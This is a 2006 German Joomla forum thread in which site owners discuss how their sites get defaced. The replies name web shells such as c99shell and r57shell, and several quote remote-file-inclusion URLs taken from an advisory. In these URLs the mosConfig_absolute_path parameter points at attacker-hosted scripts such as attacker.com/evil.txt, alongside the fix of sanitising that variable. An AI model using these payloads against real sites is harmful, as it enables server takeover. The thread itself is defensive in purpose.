selber testen?

**Zappa** · 18.07.2006 16:22

Hallo Leute

nun werden es ja immer mehr Dateien die offen zu sein scheinen.
Ich habe eigentlich keinen Bock alle ca. 5000 Dateien meiner Seite zu durchsuchen.

Was machen die Hacker eigentlich genau?
Wie geht das, das die auf meine Dateien zugriff haben?

Ich würde auch gerne wissen, ob die neue .htaccess funktioniert die ich von der joomla.org Seite mit eingebaut habe.

Meine Frage also: Wie kann ich selber zu Testzwecken versuchen, meine eigene Seite zu "hacken"?

Hat da einer Ahnung und kann mir das erkären?
Will kein Script-Kiddie werden, dazu bin ich zu alt.

Thx
Maik

**cybergurk** · 18.07.2006 16:32

Zitat von Zappa

..
Meine Frage also: Wie kann ich selber zu Testzwecken versuchen, meine eigene Seite zu "hacken"?

Hat da einer Ahnung und kann mir das erkären?
Will kein Script-Kiddie werden, dazu bin ich zu alt.

Thx
Maik

Moin, das wird wohl Dir hier niemand reinschreiben geschweige denn wissen, denn dann würde joomla ja nicht hackbar sein, es sind in der regel verkehrte Einstellung derjenigen die Joomla installieren oder Administrieren und sich vorab nicht richtig sachkundig machen, dazu kommen manche unfähige Hoster die eben genauso laienhaft denken... Sorry, mehr sagen dir andere...

**Pumphut** · 18.07.2006 20:47

Also als "Hacker" will ich die Scriptkiddies nicht bezeichnen

Eher Vandalen, die bald die Justiz zu spüren bekommen .. und deren Provider sollten besser auf abusemails reagieren.

Die machen ja nix anderes als sich klickibunti-Scripte wie sich c99shell oder r57shell usw. auf Webspace zu legen und nach bekannten unsicheren Extensions googelnd diese über zB. ../com_extcalendar/extcalendar.php?mosConfig_absolute_path=http%3A%2F %2Fmembers.lycos.co****%2F
spymetashell%2Fspymeta.dat%3F&act=f&f=index.php3&f t=edit&d=%2 ..etc auf dem fremden Webspace aufzurufen und bisschen rumzuklicken. Ansonsten haben die NULL Ahnung und die finden in Deinen 5000 Dateien nichts per Klick.

@Cybergurk .. vielleicht könnte ja mal jemand der sich mit auskennt einen schön übersichtlichen deutschsprachigen Sticky im Sicherheitsforum anfangen, damit gerade Anfänger sich etwas besser absichern können.

ZB

Bekannte unsichere Erweiterungen .. und dessen mögliche Updates/Patches

Die besten CMOD Einstellungen

.htacces Dateien wo wie warum

Wie mache ich nen Backup und stelle es wieder her

.. und so weiter. Dann würde auch nicht in jedem Thema von vorne gefragt und ich hätte ne gute Anlaufstelle wenn mich die Paranoia überkommt :-)

**patzi** · 18.07.2006 21:00

Also als "Hacker" will ich die Scriptkiddies nicht bezeichnen

Eher Vandalen, die bald die Justiz zu spüren bekommen .. und deren Provider sollten besser auf abusemails reagieren.

das sie nichts finden bezweifle ich aber stark,
nur deren schaden ist bislang nachvollziehbar...
Die könnten einfach mehr schaden anrichten indem Sie willkührlich
einzelne Dateien ändern...
wenn sie dann nicht dabei schreiben würden das die Site gehacked ist würdest du dich
evtl. totsuchen

Wie gesagt das meinste sind wie du schon sagtest Nachahmer aber ein paar sollte
man wirklich nicht als Scriptkiddies abtun...

**Pumphut** · 18.07.2006 21:25

JA auch wieder war. Wer weiß wie lange das schon so geht und richtige Hacker, die im Gegensatz zu Scriptkiddies keine Spuren hinterlassen wollen, auf diversen Seiten herumbasteln und irgendwelche Sachen installieren für die man am Ende als Domaininhaber noch rechtlich zur Verantwortung gezogen wird.
Da sollten wir den Vandalen eigentlich dankbar sein das sie uns so "schonend" darauf hinweisen .. obwohl eine Mail auch genügen würde

Leute die bischen auf solchen Tools rumklicken sind die Bezeichnung "Hacker" nicht wert.

Ich dachte ja immer die Provider sind auf Zack und unterbinden solche Sachen per Filter, sodas die weder irgendwo hoch geladen noch per Kreuzverknüpfung ausgeführt werden können.

**der_russe** · 19.07.2006 09:30

eine nutzliche componente für den allg. sicherheitscheck ist die hier

sonst kannst du die seite hier anschauen (leider nur russisch

)

wäre auch ein vorschlag an seitenbetreiber ein bereich "sicherheit" unter downloads einzurichten...

in diesem sinne

Haltrust · 19.07.2006 09:43

Es liegt wohl auch daran, dass $mosConfig_absolute_path nicht darauf überprüft wird, ob der Pfad auf dem eigenen Server liegt. Ich habe im Forum von Joomla.org an drei Beispielen darauf hingewiesen..

Variables $mosConfig_absolute_path are not properly sanitized. When
register_globals=on
and allow_fopenurl=on an attacker can exploit this vulnerability with a
simple php injection script.

Proof Of Concept:
~~~~~~~~~~~~~~~

http://[target]/[path]/components/com_hashcash/server.php?mosConfig_absolute_path=http://attacker.com/evil.txt?
http://[target]/[path]/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://evilscript
http://[target]/[path]/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://attacker.com/evil.txt?

Solution:
~~~~~~~

sanitize variabel $mosConfig_absolute_path.

Quelle

http://forum.joomla.org/index.php/to...html#msg401990

In dem Thread wird lang und breit auf Joomla.org allerdings nur diskutiert, inwieweit das Core Team überhaupt verantwortlich ist, Drittkomponenten sicherer zu machen. Da bekomme ich einen Magenpförtnerkrampf. Besonders dann, wenn gerade Johan Janssens
vom Core Team selbst die Sitemap geschrieben hat, die verletzlich ist:

PHP-Code:




http://[target]/[path]/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://attacker.com/evil.txt?

Thema: selber testen?

LinkBack

Themen-Optionen

Thema durchsuchen

Anzeige

selber testen?

selber testen

Ähnliche Themen

OpenSEF 2.0.0-RC5.pr12 for Joomla! 1.0.x zum Testen

xxx.sql datei local testen

Module u. Komponenten ausgiebig testen

Mehrere Mambo Pakete local testen

Seite vor dem veröffentlichen testen?

Lesezeichen

Lesezeichen

Berechtigungen